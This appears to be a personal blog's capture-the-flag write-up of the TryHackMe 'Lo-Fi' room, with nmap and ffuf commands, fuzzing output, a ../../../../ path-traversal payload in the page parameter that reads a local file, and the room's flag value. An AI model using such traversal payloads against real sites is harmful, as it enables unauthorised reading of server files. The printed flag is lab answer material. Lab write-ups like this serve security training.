Skip to content

chojnowski.it

THM Lo Fi done

THM Lo Fi done

Lo-Fi¶

Notes¶

OS:¶

Linux

Technology:¶

IP Address:¶

10.10.129.160

Open ports:¶

22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))

Users and pass:¶

Nmap¶

sudo nmap -A -sV --script=default -p- -oA 10.10.129.160_nmap 10.10.129.160 ; cat 10.10.129.160_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"

Ffuz: http://10.10.129.160¶

┌──(kali㉿kali)-[~/Desktop/writeups/THM/THM_Lo-Fi]
└─$ ffuf -u http://10.10.129.160/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o 10.10.129.160_ffuz -of all -e .php,.html,.txt,.bac,.backup,.md,.git,.txt

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.129.160/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/big.txt
 :: Extensions       : .php .html .txt .bac .backup .md .git .txt 
 :: Output file      : 10.10.129.160_ffuz.{json,ejson,html,md,csv,ecsv}
 :: File format      : all
 :: Follow redirects : false
 :: Calibration      : true
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

coffee.php              [Status: 200, Size: 286, Words: 18, Lines: 5, Duration: 49ms]
game.php                [Status: 200, Size: 284, Words: 18, Lines: 5, Duration: 60ms]
index.php               [Status: 200, Size: 4162, Words: 1375, Lines: 128, Duration: 55ms]
:: Progress: [184221/184221] :: Job [1/1] :: 763 req/sec :: Duration: [0:04:27] :: Errors: 0 ::

LFI¶

Ffuz: http://10.10.129.160/?page=../../../../FUZZ¶

┌──(kali㉿kali)-[~/Desktop/writeups/THM/THM_Lo-Fi]
└─$ ffuf -u "http://10.10.129.160/?page=../../../../FUZZ" -c -w /usr/share/wordlists/dirb/big.txt -ac -o 10.10.129.160_lfi_ffuz -of all -e .txt

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.129.160/?page=../../../../FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/big.txt
 :: Extensions       : .txt 
 :: Output file      : 10.10.129.160_lfi_ffuz.{json,ejson,html,md,csv,ecsv}
 :: File format      : all
 :: Follow redirects : false
 :: Calibration      : true
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

bin                     [Status: 200, Size: 3877, Words: 1358, Lines: 124, Duration: 49ms]
boot                    [Status: 200, Size: 3877, Words: 1358, Lines: 124, Duration: 102ms]
dev                     [Status: 200, Size: 3877, Words: 1358, Lines: 124, Duration: 60ms]
etc                     [Status: 200, Size: 3877, Words: 1358, Lines: 124, Duration: 161ms]
flag.txt                [Status: 200, Size: 3915, Words: 1358, Lines: 124, Duration: 107ms]
home                    [Status: 200, Size: 3877, Words: 1358, Lines: 124, Duration: 51ms]
home page.txt           [Status: 200, Size: 3877, Words: 1358, Lines: 124, Duration: 51ms]
home page               [Status: 200, Size: 3877, Words: 1358, Lines: 124, Duration: 53ms]
lib                     [Status: 200, Size: 3877, Words: 1358, Lines: 124, Duration: 51ms]
lost+found              [Status: 200, Size: 3988, Words: 1368, Lines: 124, Duration: 50ms]
lost+found.txt          [Status: 200, Size: 3992, Words: 1368, Lines: 124, Duration: 53ms]
media                   [Status: 200, Size: 3877, Words: 1358, Lines: 124, Duration: 55ms]
mnt                     [Status: 200, Size: 3877, Words: 1358, Lines: 124, Duration: 55ms]
opt                     [Status: 200, Size: 3877, Words: 1358, Lines: 124, Duration: 62ms]
proc                    [Status: 200, Size: 3877, Words: 1358, Lines: 124, Duration: 56ms]
root                    [Status: 200, Size: 3877, Words: 1358, Lines: 124, Duration: 52ms]
run                     [Status: 200, Size: 3877, Words: 1358, Lines: 124, Duration: 55ms]
sbin                    [Status: 200, Size: 3877, Words: 1358, Lines: 124, Duration: 54ms]
srv                     [Status: 200, Size: 3877, Words: 1358, Lines: 124, Duration: 50ms]
sys                     [Status: 200, Size: 3877, Words: 1358, Lines: 124, Duration: 173ms]
tmp                     [Status: 200, Size: 3877, Words: 1358, Lines: 124, Duration: 61ms]
usr                     [Status: 200, Size: 3877, Words: 1358, Lines: 124, Duration: 60ms]
var                     [Status: 200, Size: 3877, Words: 1358, Lines: 124, Duration: 54ms]
:: Progress: [40938/40938] :: Job [1/1] :: 657 req/sec :: Duration: [0:01:12] :: Errors: 0 ::

Read flag: flag.txt¶

http://10.10.129.160/?page=../../../../flag.txt
---
flag{e4478e0eab69bd642b8238765dcb7d18}

Lessons Learned¶

Tags¶